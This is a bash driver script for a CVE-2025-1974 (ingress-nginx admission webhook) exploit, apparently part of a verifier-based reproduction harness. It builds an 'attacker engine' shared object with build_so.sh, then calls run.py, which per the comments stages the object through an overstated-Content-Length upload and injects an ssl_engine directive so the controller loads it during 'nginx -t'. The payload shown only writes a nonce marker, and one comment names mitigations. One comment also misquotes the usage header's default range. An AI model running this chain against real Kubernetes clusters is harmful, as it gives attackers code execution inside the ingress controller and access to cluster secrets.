#!/usr/bin/env bash
# CVE-2025-1974 single-entrypoint exploit.
#
#   run.sh <NONCE> <MARKER_PATH> <SECRET_REF> [N_MIN] [N_MAX]
#
#   <NONCE>        per-attempt nonce injected by the verifier; baked into the
#                  staged .so constructor and written to the marker on dlopen.
#   <MARKER_PATH>  controller-pod-local path the .so writes the nonce to
#                  (uid 101 writable, e.g. /tmp/<nonce>).
#   <SECRET_REF>   referenceable auth-tls ca.crt secret that opens the render
#                  gate: ingress-nginx/ingressnightmare-auth-ca
#   [N_MIN N_MAX]  optional brute-force range for the on-disk client-body
#                  counter N (default 0..200; see the N_MAX fallback below).
#
# Builds the musl/aarch64 engine .so (NONCE + MARKER baked in), then stages it
# via a held over-stated-Content-Length upload and injects ssl_engine through
# the admission webhook so the controller dlopen's it during `nginx -t`.
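# Strict mode: stop on any failed command, unset variable or failed pipeline
# stage, so a failed build never falls through to the second step.
set -euo pipefail
HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"

# Print a diagnostic on stderr and exit non-zero.
die() {
  printf '[run] error: %s\n' "$*" >&2
  exit 1
}

NONCE="${1:?need NONCE}"
MARKER="${2:?need MARKER_PATH}"
SECRET_REF="${3:?need SECRET_REF}"
N_MIN="${4:-0}"
# Effective default upper bound is 200 (the usage header has said 0..60).
N_MAX="${5:-200}"

# NONCE is spliced into a file name below and, per the usage header, is baked
# into the built .so. Restrict it to a conservative token so a malformed value
# cannot carry path separators or quoting characters into either place.
# NOTE(review): assumes verifier nonces fit this alphabet; widen if they do not.
readonly nonce_re='^[A-Za-z0-9._-]+$'
[[ "$NONCE" =~ $nonce_re ]] || die "NONCE must match [A-Za-z0-9._-]+"

# NOTE(review): MARKER and SECRET_REF are passed through unvalidated; how
# build_so.sh and run.py embed them is not visible from this file.

# The range bounds must be non-negative integers with N_MIN <= N_MAX.
# 10# forces base 10 so a leading zero is not read as octal.
readonly uint_re='^[0-9]+$'
[[ "$N_MIN" =~ $uint_re ]] || die "N_MIN must be a non-negative integer"
[[ "$N_MAX" =~ $uint_re ]] || die "N_MAX must be a non-negative integer"
((10#$N_MIN <= 10#$N_MAX)) || die "N_MIN must not exceed N_MAX"

# Fail early with a clear message if either helper is missing.
[[ -f "$HERE/build_so.sh" ]] || die "missing helper: $HERE/build_so.sh"
[[ -f "$HERE/run.py" ]] || die "missing helper: $HERE/run.py"

SO="$HERE/engine_${NONCE}.so"

echo "[run] building attacker engine .so (musl/aarch64) ..."
bash "$HERE/build_so.sh" "$NONCE" "$MARKER" "$SO"

# Defender note: per the usage header, this step depends on the admission
# webhook being reachable and on a referenceable Secret. Restricting network
# access to the webhook and running a fixed ingress-nginx release remove that
# precondition.
echo "[run] staging + injecting ..."
python3 "$HERE/run.py" "$NONCE" "$MARKER" "$SECRET_REF" "$SO" "$N_MIN" "$N_MAX"

# This script does not check the marker itself; a zero exit only means both
# helpers returned success.
echo "[run] done. The marker should now exist at $MARKER inside the controller pod."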
